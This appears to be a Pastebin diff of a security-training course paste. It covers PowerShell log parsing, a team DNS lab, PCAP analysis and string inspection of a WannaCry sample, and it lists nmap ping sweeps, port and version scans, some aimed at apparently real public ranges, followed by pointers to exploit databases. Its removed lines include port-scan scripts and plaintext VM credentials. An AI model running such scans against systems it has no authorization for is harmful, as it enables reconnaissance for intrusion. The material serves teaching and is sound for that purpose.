View difference between Paste ID: <a href="/aGE8gpwx">aGE8gpwx</a> and <a href="/1mE4i7Hy">1mE4i7Hy</a> - Pastebin.com

View difference between Paste ID: aGE8gpwx and 1mE4i7Hy

SHOW: | | - or go back to the newest paste.

1	-	#######################
1	+
2	-	# VMs for this course #
2	+
3	-	#######################
3	+
4	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
4	+
5	-	username: workshop
5	+
6	-	password: password
6	+
7	-
7	+
8	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
8	+
9	-	user: infosecaddicts
9	+
10	-	pass: infosecaddicts
10	+
11
12	-	You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
12	+
13
14	-	You'll need to create directory in the Win7 VM called "c:\ps"
14	+
15
16	-	In this file you will also need to change the text '149.28.201.171' to the IP address of your Ubuntu host.
16	+
17		cd c:\
18		dir
19		cd
20		ls
21		---------------------------------------------------------------
22
23
24		To obtain a list of cmdlets, use the Get-Command cmdlet
25		------------------------Type This------------------------------
26		Get-Command
27		---------------------------------------------------------------
28
29
30		You can use the Get-Alias cmdlet to see a full list of aliased commands.
31		------------------------Type This------------------------------
32		Get-Alias
33		---------------------------------------------------------------
34
35
36		Don't worry you won't blow up your machine with Powershell
37		------------------------Type This------------------------------
38		Get-Process \| stop-process Don't press [ ENTER ] What will this command do?
39		Get-Process \| stop-process -whatif
40		---------------------------------------------------------------
41
42		To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
43		------------------------Type This------------------------------
44		Get-Help Get-Command
45
46		Get-Help Get-Service –online
47
48		Get-Service -Name TermService, Spooler
49
50		Get-Service –N BITS
51		---------------------------------------------------------------
52
53
54
55
56
57		- Run cmdlet through a pie and refer to its properties as $_
58		------------------------Type This------------------------------
59		Get-Service \| where-object { $_.Status -eq "Running"}
60		---------------------------------------------------------------
61
62
63
64		- PowerShell variables begin with the $ symbol. First lets create a variable
65		------------------------Type This------------------------------
66		$serv = Get-Service –N Spooler
67		---------------------------------------------------------------
68
69		To see the value of a variable you can just call it in the terminal.
70		------------------------Type This------------------------------
71		$serv
72
73		$serv.gettype().fullname
74		---------------------------------------------------------------
75
76
77		Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
78		------------------------Type This------------------------------
79		$serv \| Get-Member
80
81		Get-Member -InputObject $serv
82		---------------------------------------------------------------
83
84
85
86
87		Let's use a method and a property with our object.
88		------------------------Type This------------------------------
89		$serv.Status
90		$serv.Stop()
91		$serv.Refresh()
92		$serv.Status
93		$serv.Start()
94		$serv.Refresh()
95		$serv.Status
96		---------------------------------------------------------------
97
98
99		If you want some good command-line shortcuts you can check out the following link:
100		https://technet.microsoft.com/en-us/library/ff678293.aspx
101
102		#############################
103		# Simple Event Log Analysis #
104		#############################
105		Let's setup a directory to work in:
106		------------------------Type This------------------------------
107		cd c:\
108
109		mkdir ps
110
111		cd ps
112		---------------------------------------------------------------
113
114		Step 1: Dump the event logs
115		---------------------------
116		The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
117
118		To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
119		If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
120		------------------------Type This------------------------------
121		Get-EventLog -LogName application \| Export-Clixml Applog.xml
122
123		type .\Applog.xml
124
125		$logs = "system","application","security"
126		---------------------------------------------------------------
127
128
129		The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
130		------------------------Type This------------------------------
131		$logs \| % { get-eventlog -LogName $_ \| Export-Clixml "$_.xml" }
132		---------------------------------------------------------------
133
134
135
136
137		Step 2: Import the event log of interest
138		----------------------------------------
139		To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
140		Store the results in a variable.
141		Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
142
143		The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
144		------------------------Type This------------------------------
145		$seclog = Import-Clixml security.xml
146
147		$seclog \| select -Last 5
148		---------------------------------------------------------------
149
150		Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
151		------------------------Type This------------------------------
152		Get-EventLog Application -After (Get-Date).AddDays(-1)
153		---------------------------------------------------------------
154		You can use '-after' and '-before' to filter date ranges
155
156		One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
157		By default, an ordinary user does not have permission to read the security log.
158
159
160
161
162		Step 3: Drill into a specific entry
163		-----------------------------------
164		To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
165
166		------------------------Type This------------------------------
167		$seclog \| select -first 1 \| fl *
168		---------------------------------------------------------------
169
170		The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
171
172		------------------------Type This------------------------------
173		($seclog \| select -first 1).message
174
175		(($seclog \| select -first 1).message).gettype()
176		---------------------------------------------------------------
177
178
179		In the *nix world you often want a count of something (wc -l).
180		How often is the SeSecurityPrivilege privilege mentioned in the message property?
181		To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
182		------------------------Type This------------------------------
183		$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| measure
184		---------------------------------------------------------------
185		If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
186
187		------------------------Type This------------------------------
188		$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| group eventid
189		---------------------------------------------------------------
190
191		Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
192		Use the count property to determine the total number of entries in the event log.
193		------------------------Type This------------------------------
194		$seclog.Count
195		---------------------------------------------------------------
196
197
198
199
200
201		############################
202		# Simple Log File Analysis #
203		############################
204
205
206		You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
207
208		------------------------Type This------------------------------
209		cd c:\ps
210		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
211		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
212		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
213		---------------------------------------------------------------
214
215
216
217		The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
218		------------------------Type This------------------------------
219		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line
220		---------------------------------------------------------------
221
222
223
224		To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
225		------------------------Type This------------------------------
226		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line \| Measure-Object
227		---------------------------------------------------------------
228
229
230		To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
231		------------------------Type This------------------------------
232		Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique \| Measure-Object
233		---------------------------------------------------------------
234
235
236		Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
237		------------------------Type This------------------------------
238		Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique
239		---------------------------------------------------------------
240
241		In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
242		This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
243		------------------------Type This------------------------------
244		Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select value \| group value \| sort count -des
245		---------------------------------------------------------------
246
247
248
249		##############################################
250		# Parsing Log files using windows PowerShell #
251		##############################################
252
253		Download the sample IIS log http://pastebin.com/LBn64cyA
254
255		------------------------Type This------------------------------
256		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
257
258		Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV")}
259		---------------------------------------------------------------
260
261
262		The above command would give us all the WebDAV requests.
263
264		To filter this to a particular user name, use the below command:
265		------------------------Type This------------------------------
266		Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV") -and ($_ \| Select-String "OPTIONS")}
267		---------------------------------------------------------------
268
269
270		Some more options that will be more commonly required :
271
272		For Outlook Web Access : Replace WebDAV with OWA
273
274		For EAS : Replace WebDAV with Microsoft-server-activesync
275
276		For ECP : Replace WebDAV with ECP
277
278
279
280		--------------------------------------------
281
282		Lab Exercise: Setting Up DNS Servers with PowerShell for Teams
283		This lab exercise will guide students through the process of setting up DNS servers using PowerShell, configured specifically for teams. Each team’s DNS server will resolve the hostnames of the other teams' servers, enabling cross-team communication via ping by name.
284
285		Lab Exercise: Setting Up Team-Specific DNS Servers with PowerShell
286		Objective: Install and configure DNS servers on Windows Server for three teams, ensuring that each team's server can resolve the names of the other teams' servers.
287
288		Steps:
289
290		Step 1: Install the DNS Server Role
291		Open PowerShell as Administrator.
292		Run the following command to install the DNS Server role:
293		---------------------------- Type this ----------------------------
294		Install-WindowsFeature -Name DNS -IncludeManagementTools
295		-------------------------------------------------------------------
296
297
298		Verify the installation:
299		---------------------------- Type this ----------------------------
300		Get-WindowsFeature -Name DNS
301		-------------------------------------------------------------------
302
303		Step 2: Detect the Server’s IP Address
304	-	####################################################################
304	+	Detect the server's IP address, which will be used for DNS configuration:
305	-	# Windows PowerShell: Extracting Strings Using Regular Expressions #
305	+	---------------------------- Type this -----------------------------------------------------------------------------------------------------
306	-	####################################################################
306	+	$ipAddress = (Get-NetIPAddress -AddressFamily IPv4 \| Where-Object { $_.PrefixOrigin -eq "Dhcp" -or $_.PrefixOrigin -eq "Manual" }).IPAddress
307		Write-Host "Detected IP Address: $ipAddress"
308		---------------------------------------------------------------------------------------------------------------------------------------------
309	-	Regex Characters you might run into:
309	+
310		Step 3: Create DNS Zones for Each Team
311	-	^ Start of string, or start of line in a multiline pattern
311	+	Create a DNS zone for each team. Replace YourTeamNumber with the team number (1, 2, or 3) and YourTeamName with the corresponding team name (team1, team2, or team3):
312	-	$ End of string, or start of line in a multiline pattern
312	+	---------------------------- Team 1 type this ----------------------------
313	-	\b Word boundary
313	+	$teamNumber = "1"
314	-	\d Digit
314	+	$teamName = "alsadd.qesc.nosc"
315	-	\ Escape the following character
315	+	Add-DnsServerPrimaryZone -Name $teamName -ReplicationScope "Forest"
316	-	* 0 or more {3} Exactly 3
316	+	-------------------------------------------------------------------
317	-	+ 1 or more {3,} 3 or more
317	+
318	-	? 0 or 1 {3,5} 3, 4 or 5
318	+
319		---------------------------- Team 2 Type this ---------------------
320		$teamNumber = "2"
321		$teamName = "alduhail.qesc.nosc"
322	-	To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
322	+	Add-DnsServerPrimaryZone -Name $teamName -ReplicationScope "Forest"
323		-------------------------------------------------------------------
324	-	1) The input file that will be parsed
324	+
325
326	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
326	+	---------------------------- Team 3 Type this ---------------------
327	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
327	+	$teamNumber = "3"
328	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
328	+	$teamName = "eljaish.qesc.nosc"
329		Add-DnsServerPrimaryZone -Name $teamName -ReplicationScope "Forest"
330	-	2) The regular expression that the input file will be compared against
330	+	-------------------------------------------------------------------
331
332	-	3) The output file for where the extracted data will be placed.
332	+	Step 4: Add DNS Records for Other Teams
333		Add A records for the other teams' servers. For example, if this is team 1, add records for team 2 and team 3:
334	-	Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
334	+	---------------------------- Team 1 type this ---------------------------------------------------------
335	-	Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
335	+	Add-DnsServerResourceRecordA -ZoneName "alsadd.qesc.nosc" -Name "alduhail" -IPv4Address "52.53.212.185"
336		Add-DnsServerResourceRecordA -ZoneName "alsadd.qesc.nosc" -Name "eljaish" -IPv4Address "54.193.54.37"
337	-	To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
337	+	-------------------------------------------------------------------------------------------------------
338
339	-	$input_path = 'c:\ps\emails.txt'
339	+
340	-	$output_file = 'c:\ps\extracted_addresses.txt'
340	+
341	-	$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
341	+	---------------------------- Team 2 type this ---------------------------------------------------------
342	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
342	+	Add-DnsServerResourceRecordA -ZoneName "alduhail.qesc.nosc" -Name "alsadd" -IPv4Address "54.177.32.57"
343		Add-DnsServerResourceRecordA -ZoneName "alduhail.qesc.nosc" -Name "eljaish" -IPv4Address "54.193.54.37"
344		-------------------------------------------------------------------------------------------------------
345
346	-	In this script, we have the following variables:
346	+
347
348	-	1) $input_path to hold the path to the input file we want to parse
348	+	---------------------------- Team 3 type this ----------------------------------------------------------
349		Add-DnsServerResourceRecordA -ZoneName "eljaish.qesc.nosc" -Name "alsadd" -IPv4Address "54.177.32.57"
350	-	2) $output_file to hold the path to the file we want the results to be stored in
350	+	Add-DnsServerResourceRecordA -ZoneName "eljaish.qesc.nosc" -Name "alduhail" -IPv4Address "52.53.212.185"
351		--------------------------------------------------------------------------------------------------------
352	-	3) $regex to hold the regular expression pattern to be used when the strings are being matched.
352	+
353
354	-	The select-string cmdlet contains various parameters as follows:
354	+
355		Verify DNS Records:
356	-	1) "-Path" which takes as input the full path to the input file
356	+
357		Query the DNS server to ensure the A records are properly configured:
358	-	2) "-Pattern" which takes as input the regular expression used in the matching process
358	+
359		To verify the DNS records for alduhail.qesc.nosc (Team 2) and eljaish.qesc.nosc (Team 3), Team 1 should use:
360	-	3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
360	+	---------------------------- Team 1 type this ---------------------------------------------------------
361		Resolve-DnsName -Name "alduhail.qesc.nosc" # Verifying Team 2's DNS record
362	-	Using ">" the results are written to the destination specified in the $output_file variable.
362	+	Resolve-DnsName -Name "eljaish.qesc.nosc" # Verifying Team 3's DNS record
363		-------------------------------------------------------------------------------------------------------
364	-	Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
364	+
365
366	-	IP addresses
366	+	To verify the DNS records for alsadd.qesc.nosc (Team 1) and eljaish.qesc.nosc (Team 3), Team 2 should use:
367		---------------------------- Team 2 type this ---------------------------------------------------------
368	-	For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
368	+	Resolve-DnsName -Name "alsadd.qesc.nosc" # Verifying Team 1's DNS record
369		Resolve-DnsName -Name "eljaish.qesc.nosc" # Verifying Team 3's DNS record
370	-	$input_path = 'c:\ps\ip_addresses.txt'
370	+	-------------------------------------------------------------------------------------------------------
371	-	$output_file = 'c:\ps\extracted_ip_addresses.txt'
371	+
372	-	$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
372	+
373	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
373	+	To verify the DNS records for alsadd.qesc.nosc (Team 1) and alduhail.qesc.nosc (Team 2), Team 3 should use:
374		---------------------------- Team 3 type this ----------------------------------------------------------
375		Resolve-DnsName -Name "alsadd.qesc.nosc" # Verifying Team 1's DNS record
376		Resolve-DnsName -Name "alduhail.qesc.nosc" # Verifying Team 2's DNS record
377		--------------------------------------------------------------------------------------------------------
378	-	URLs
378	+
379	-	----
379	+
380	-	For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
380	+
381	-	You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
381	+
382
383	-	$input_path = 'c:\ps\URL_addresses.txt'
383	+
384	-	$output_file = 'c:\ps\extracted_URL_addresses.txt'
384	+
385	-	$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=])?'
385	+
386	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
386	+	##################################################################
387		# Analyzing a PCAP Prads #
388		# Note: run as regular user #
389	-	In addition to the examples above, many other types of strings can be extracted using this script.
389	+	##################################################################
390	-	All you need to do is switch the regular expression in the "$regex" variable!
390	+
391	-	In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
391	+	---------------------------Type This-----------------------------------
392		cd ~
393
394		prads -r suspicious-time.pcap -l prads-asset.log
395
396		cat prads-asset.log \| less
397
398	-	########################################
398	+	cat prads-asset.log \| grep SYN \| grep -iE 'windows\|linux'
399	-	# Basic Network Commands in PowerShell #
399	+
400	-	########################################
400	+	cat prads-asset.log \| grep CLIENT \| grep -iE 'safari\|firefox\|opera\|chrome'
401
402		cat prads-asset.log \| grep SERVER \| grep -iE 'apache\|linux\|ubuntu\|nginx\|iis'
403	-	https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
403	+	-----------------------------------------------------------------------
404
405
406	-	###################
406	+
407	-	# Pentester Tasks #
407	+
408	-	###################
408	+	##################################
409		# PCAP Analysis with ChaosReader #
410	-	http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
410	+	# Note: run as regular user #
411		##################################
412		---------------------------Type This-----------------------------------
413	-	Listing IPs
413	+
414	-	-----------
414	+
415	-	One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
415	+	perl chaosreader.pl suspicious-time.pcap
416
417		cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
418	-	$octect = "149.28.201."
418	+
419	-	$lastoctect = (1..255)
419	+	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
420	-	$lastoctect \| ForEach-Object {write-host "$($octect)$($_)"}
420	+
421
422		for i in session_00[0-9]*.http.html; do srcip=`cat "$i" \| grep 'http:\ ' \| awk '{print $2}' \| cut -d ':' -f1`; dstip=`cat "$i" \| grep 'http:\ ' \| awk '{print $4}' \| cut -d ':' -f1`; host=`cat "$i" \| grep 'Host:\ ' \| sort -u \| sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done \| sort -u
423
424	-	Ping Sweep
424	+	python -m SimpleHTTPServer
425		**** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page ***
426	-	PowerShell provides several methods for doing Ping
426	+
427	-	Test-Connection cmdlet
427	+	------------------------------------------------------------------------
428	-	Creation of a WMI Object
428	+
429	-	.Net System.Net.NetworkInformation.Ping Object
429	+
430
431
432
433
434	-	function New-IPRange ($start, $end) {
434	+
435	-	$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
435	+
436	-	[Array]::Reverse($ip1)
436	+
437	-	$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
437	+	# PCAP Analysis with tshark #
438		# Note: run as regular user #
439	-	$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
439	+
440	-	[Array]::Reverse($ip2)
440	+	---------------------------Type This-----------------------------------
441	-	$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address
441	+	tshark -i ens3 -r suspicious-time.pcap -qz io,phs
442
443	-	for ($x=$ip1; $x -le $ip2; $x++) {
443	+	tshark -r suspicious-time.pcap -qz ip_hosts,tree
444	-	$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
444	+
445	-	[Array]::Reverse($ip)
445	+	tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" \| uniq
446	-	$ip -join '.'
446	+
447	-	}
447	+	tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
448	-	}
448	+
449	-	$ping = New-Object System.Net.NetworkInformation.Ping
449	+
450	-	New-IPRange 149.28.201.1 149.28.201.250 \| ForEach-Object {$ping.Send($_, 100)} \| where {$_.status -eq "Success"}
450	+	tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
451
452		whois rapidshare.com.eyu32.ru
453
454	-	Reverse Lookups
454	+	whois sploitme.com.cn
455	-	---------------
455	+
456	-	For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry
456	+	tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
457
458		tshark -r suspicious-time.pcap -qz http_req,tree
459	-	------Deprecated--------
459	+
460	-	[System.Net.Dns]::GetHostByAddress("162.243.126.247")
460	+	tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
461	-	------Deprecated--------
461	+
462		tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' \| grep 10.0.3.15 \| sed -e 's/\?[^cse].*/\?\.\.\./g'
463	-	Use getnameinfo instead:
463	+	------------------------------------------------------------------------
464	-	https://msdn.microsoft.com/en-us/library/windows/desktop/ms738532(v=vs.85).aspx
464	+
465
466	-	References:
466	+
467	-	https://stackoverflow.com/questions/10346194/how-to-use-getnameinfo-instead-of-gethostbyname
467	+	---------------------------Type This----------------------------------
468		hexdump -n 2 -C wannacry.exe
469		----------------------------------------------------------------------
470
471	-	Forward Lookups
471	+
472	-	---------------
472	+	*What is '4d 5a' or 'MZ'*
473		Reference:
474		http://www.garykessler.net/library/file_sigs.html
475	-	[System.Net.Dns]::GetHostAddresses("www.google.com")
475	+
476
477
478
479	-	Port Scans
479	+	---------------------------Type This-----------------------------------
480		objdump -x wannacry.exe
481	-	To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
481	+
482	-	For TCP the .Net System.Net.Sockets.TcpClient
482	+	strings wannacry.exe
483	-	For UDP the .Net System.Net.Sockets.UdpClient
483	+
484		strings wannacry.exe \| grep -i dll
485
486		strings wannacry.exe \| grep -i library
487
488	-	TCP Scan (Windows 7)
488	+	strings wannacry.exe \| grep -i reg
489
490	-	NOTE: If you are using Windows 7, use the code below
490	+	strings wannacry.exe \| grep -i key
491
492	-	$ports=22,80,443,3389
492	+	strings wannacry.exe \| grep -i rsa
493	-	$target = "149.28.201.171"
493	+
494	-	foreach ($i in $ports) {
494	+	strings wannacry.exe \| grep -i open
495	-	try {
495	+
496	-	$socket = new-object System.Net.Sockets.TCPClient($target, $i);
496	+	strings wannacry.exe \| grep -i get
497	-	} catch {}
497	+
498	-	if ($socket -eq $NULL) {
498	+	strings wannacry.exe \| grep -i mutex
499	-	echo "$target:$i - Closed";
499	+
500	-	} else {
500	+	strings wannacry.exe \| grep -i irc
501	-	echo "$target:$i - Open";
501	+
502	-	$socket = $NULL;
502	+	strings wannacry.exe \| grep -i join
503	-	}}
503	+
504		strings wannacry.exe \| grep -i admin
505
506		strings wannacry.exe \| grep -i list
507		----------------------------------------------------------------------
508	-	TCP Scan (Windows 10)
508	+
509	-	---------------------
509	+
510	-	NOTE: If you are using Windows 10, use the code below
510	+
511		Ok, let's look for the individual strings
512
513	-	$ports=22,80,443,3389
513	+
514	-	$target = "149.28.201.171"
514	+	---------------------------Type This-----------------------------------
515	-	foreach ($i in $ports) {
515	+	strings wannacry.exe \| grep -i ooops
516	-	try {
516	+
517	-	$socket = new-object System.Net.Sockets.TCPClient($target, $i);
517	+	strings wannacry.exe \| grep -i wanna
518	-	} catch {}
518	+
519	-	if ($socket -eq $NULL) {
519	+	strings wannacry.exe \| grep -i wcry
520	-	echo "${target}:$i - Closed";
520	+
521	-	} else {
521	+	strings wannacry.exe \| grep -i wannacry
522	-	echo "${target}:$i - Open";
522	+
523	-	$socket = $NULL;
523	+	strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
524	-	}}
524	+	----------------------------------------------------------------------
525
526
527
528		#################################
529	-	##########################
529	+	----------- ############### # Day 2: Software Exploitation # ############### -----------
530	-	# Parsing Nmap XML Files #
530	+	#################################
531	-	##########################
531	+
532	-	If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
532	+	########################
533	-	https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
533	+	# Scanning Methodology #
534		########################
535
536		- Ping Sweep
537		What's alive?
538		------------
539
540		---------------------------Type this command-----------------------------------
541		sudo nmap -sP 157.166.226.*
542		-------------------------------------------------------------------------------
543
544
545
546		-if -SP yields no results try:
547		---------------------------Type this command-----------------------------------
548		sudo nmap -sL 157.166.226.*
549		-------------------------------------------------------------------------------
550	-	mkdir PowerShell-Files
550	+
551	-	cd PowerShell-Files
551	+
552	-	(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")
552	+
553	-	(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")
553	+	-Look for hostnames:
554	-	(new-object System.Net.WebClient).DownloadFile("https://s3.amazonaws.com/infosecaddictsfiles/PowerShell/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")
554	+	---------------------------Type this command-----------------------------------
555		sudo nmap -sL 157.166.226.* \| grep cnn
556		-------------------------------------------------------------------------------
557
558	-	Run Powershell as administrator
558	+
559
560	-	cd C:\ps\\PowerShell-Files
560	+	- Port Scan
561		What's where?
562	-	Get-ExecutionPolicy
562	+
563	-	Set-ExecutionPolicy Unrestricted –Force
563	+	---------------------------Type this command-----------------------------------
564		sudo nmap -sS 68.183.112.122
565		-------------------------------------------------------------------------------
566
567	-	Parse nmap XML
567	+
568
569	-	.\parse-nmap.ps1 samplescan.xml
569	+	- Bannergrab/Version Query
570		What versions of software are running
571		-------------------------------------
572
573	-	Process all XML files
573	+	---------------------------Type this command-----------------------------------
574		sudo nmap -sV 68.183.112.122
575	-	.\parse-nmap.ps1 *.xml
575	+	-------------------------------------------------------------------------------
576
577
578	-	Piping also works
578	+
579
580	-	dir *.xml \| .\parse-nmap.ps1
580	+	- Vulnerability Research
581		Lookup the banner versions for public exploits
582		----------------------------------------------
583	-	Advanced parsing with filtering conditions
583	+	https://www.exploit-db.com/search
584		http://securityfocus.com/bid
585	-	.\parse-nmap.ps1 samplescan.xml \| where {$_.OS -like "Windows XP"} \| format-table IPv4,HostName,OS
585	+	https://packetstormsecurity.com/files/tags/exploit/
586
587
588
589	-	More parsing
589	+	Network Penetration Testing Process (known vulnerabilities)
590		-----------------------------------------------------------
591	-	.\parse-nmap.ps1 samplescan.xml \| where {$_.Ports -like "open:tcp:22"}
591	+
592
593		1. Ping Sweep:
594	-	Parsing with match and multiple conditions
594	+	The purpose of this step is to identify live hosts
595
596	-	.\parse-nmap.ps1 samplescan.xml \|where {$_.Ports -match "open:tcp:80\|open:tcp:443"}
596	+	nmap -sP <ip-address/ip-range>
597
598
599		2. Port Scan
600	-	CSV Export
600	+	Identify running services. We use the running services to map the network topology.
601
602	-	.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " \| where {$_.Ports -match "open:tcp:80"} \| export-csv weblisteners.csv
602	+	nmap -sS <ip-address/ip-range>
603
604
605	-	Import Data from CSV
605	+	3. Bannergrab
606		Identify the version of version of software running on each port
607	-	$data = import-csv weblisteners.csv
607	+
608	-	$data \| where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
608	+	nmap -sV <ip-address/ip-range>
609
610
611
612	-	Export to HTML
612	+	4. Vulnerability Research
613		Use the software version number to research and determine if it is out of date (vulnerable).
614	-	.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " \|select-object IPv4,HostName,OS \| ConvertTo-Html \| out-file report.html
614	+
615		exploit-db.com/search
616
617
618	-	########################################
618	+
619	-	# Parsing Nessus scans with PowerShell #
619	+
620	-	########################################
620	+
621	-	If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
621	+
622	-	https://s3.amazonaws.com/infosecaddictsfiles/PowerShell-Files.zip
622	+
623		Browse to the following website with a web browser:
624		https://101.46.48.34:8834/
625		username: nessus
626	-	Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
626	+	password:
627
